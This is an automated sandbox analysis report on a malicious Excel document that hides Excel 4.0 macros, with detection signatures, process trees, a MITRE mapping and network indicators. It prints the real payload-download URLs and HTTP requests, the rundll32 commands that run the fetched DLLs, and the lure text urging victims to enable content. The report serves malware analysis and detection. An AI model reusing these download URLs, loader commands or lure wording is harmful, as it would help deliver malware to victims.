
Analysis Report Complaint-447781983-02182021.xls

Overview

General Information

Sample Name: Complaint-447781983-02182021.xls
Analysis ID: 356654
MD5: 60f845a847e771a59b97d456c494f69d
SHA1: bf79e4535e5d15cfbd4c6eb2fa2d086703ad81d6
SHA256: c44df560766b2a3f60adba4ef6448e266a3036e19fc1631ae9ada22628447319

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7104 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6624 cmdline: rundll32 ..\JDFR.hdfgr,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4552 cmdline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5940 cmdline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6808 cmdline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6880 cmdline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: Complaint-447781983-02182021.xls
Rule: SUSP_EnableContent_String_Gen
Description: Detects suspicious string that asks to enable active content in Office Doc
Author: Florian Roth
Strings:
  • 0xadf2:$e1: Enable Editing
  • 0xae3c:$e1: Enable Editing
  • 0x158cc:$e1: Enable Editing
  • 0x15916:$e1: Enable Editing
  • 0x20083:$e1: Enable Editing
  • 0x200cd:$e1: Enable Editing
  • 0xae5a:$e2: Enable Content
  • 0x15934:$e2: Enable Content
  • 0x200eb:$e2: Enable Content

Source: Complaint-447781983-02182021.xls
Rule: JoeSecurity_HiddenMacro
Description: Yara detected hidden Macro 4.0 in Excel
Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7104, ProcessCommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, ProcessId: 6624

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.dat | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: pathinanchilearthmovers.com | Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: Complaint-447781983-02182021.xls | Virustotal: Detection: 31%

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.4:49737 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe
Source: global traffic | DNS query: name: rzminc.com
Source: global traffic | TCP traffic: 192.168.2.4:49737 -> 138.36.237.100:443
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 72.52.227.180:80
Source: Joe Sandbox View | IP Address: 138.36.237.100
Source: Joe Sandbox View | IP Address: 91.199.212.52
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /xklyulyijvn/44250601302777800000.dat HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rzminc.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /eznwcdhx/44250601302777800000.dat HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: pathinanchilearthmovers.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xjzpfwc/44250601302777800000.dat HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: jugueterialatorre.com.ar
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /fdzgprclatqo/44250601302777800000.dat HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rzminc.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /SectigoRSADomainValidationSecureServerCA.crt HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Microsoft-CryptoAPI/10.0
  Host: crt.sectigo.com
Source: unknown | DNS traffic detected: queries for: rzminc.com
Source: 30D802E0E248FEE17AAF4A62594CC75A.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.4:49737 version: TLS 1.2

System Summary:

Found malicious Excel 4.0 Macro
Source: Complaint-447781983-02182021.xls | Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing 11 from the yellow bar above r ,nDLL x "p 12 Rl nDLL X 't 13 @Once You have Ena
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing, please click Enable Co R,, ,dll 1\ i ,' 14_ from the yellow bar above RunDLL x )
Source: Screenshot number: 12 | Screenshot OCR: Enable Editing, please click Enable Content 14_ from the yellow bar above 15 16 17 ,, WHY I CAN
Source: Screenshot number: 12 | Screenshot OCR: Enable Content 14_ from the yellow bar above 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT? 19
Source: Document image extraction number: 2 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8 | Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And
Found Excel 4.0 Macro with suspicious formulas
Source: Complaint-447781983-02182021.xls | Initial sample: EXEC
Source: Complaint-447781983-02182021.xls | OLE indicator, VBA macros: true
Source: Complaint-447781983-02182021.xls, type: SAMPLE | Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: classification engine | Classification label: mal100.expl.evad.winXLS@11/9@4/4
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{0BC941FB-D386-4AC7-8EE1-FDDF056384D3} - OProcSessId.dat
Source: Complaint-447781983-02182021.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: Complaint-447781983-02182021.xls | Virustotal: Detection: 31%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServerJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: rundll32.exe, 00000004.00000002.697908836.00000000011C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.693528349.0000000003330000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.723054670.0000000000E50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.716781804.0000000004AD0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.707576966.0000000000C00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000004.00000002.697908836.00000000011C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.693528349.0000000003330000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.723054670.0000000000E50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.716781804.0000000004AD0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.707576966.0000000000C00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000004.00000002.697908836.00000000011C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.693528349.0000000003330000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.723054670.0000000000E50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.716781804.0000000004AD0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.707576966.0000000000C00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000004.00000002.697908836.00000000011C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.693528349.0000000003330000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.723054670.0000000000E50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.716781804.0000000004AD0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.707576966.0000000000C00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel
Source: Yara match; File source: Complaint-447781983-02182021.xls, type: SAMPLE

    Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting (21) | Path Interception | Process Injection (1) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution (23) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools (1) | LSASS Memory | File and Directory Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll32 (1) | Security Account Manager | System Information Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol (13) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (1) | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer (1) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting (21) | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

    Behavior Graph


    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

Source | Detection | Scanner
Complaint-447781983-02182021.xls | 31% | Virustotal

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

Source | Detection | Scanner
rzminc.com | 1% | Virustotal
crt.sectigo.com | 0% | Virustotal
jugueterialatorre.com.ar | 4% | Virustotal
pathinanchilearthmovers.com | 8% | Virustotal

    URLs

Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation | safe
https://wus2-000.contentsync. | 0% | URL Reputation | safe
http://rzminc.com/fdzgprclatqo/44250601302777800000.dat | 0% | Avira URL Cloud | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
http://pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.dat | 100% | Avira URL Cloud | malware
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://wus2-000.pagecontentsync. | 0% | URL Reputation | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
http://jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.dat | 0% | Avira URL Cloud | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://ncus-000.contentsync. | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt | 0% | URL Reputation | safe
https://dataservice.o365filtering.com | 0% | URL Reputation | safe
https://api.cortana.ai | 0% | URL Reputation | safe
http://rzminc.com/xklyulyijvn/44250601302777800000.dat | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
rzminc.com | 72.52.227.180 | true | false | | unknown
crt.sectigo.com | 91.199.212.52 | true | false | | unknown
jugueterialatorre.com.ar | 138.36.237.100 | true | false | | unknown
pathinanchilearthmovers.com | 162.241.80.6 | true | true | | unknown

    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://rzminc.com/fdzgprclatqo/44250601302777800000.dat | false | Avira URL Cloud: safe | unknown
http://pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.dat | true | Avira URL Cloud: malware | unknown
http://jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.dat | false | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt | false | URL Reputation: safe | unknown
http://rzminc.com/xklyulyijvn/44250601302777800000.dat | false | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://login.microsoftonline.com/ | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://shell.suite.office.com:1443 | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://autodiscover-s.outlook.com/ | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://cdn.entity. | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://wus2-000.contentsync. | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://powerlift.acompli.net | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
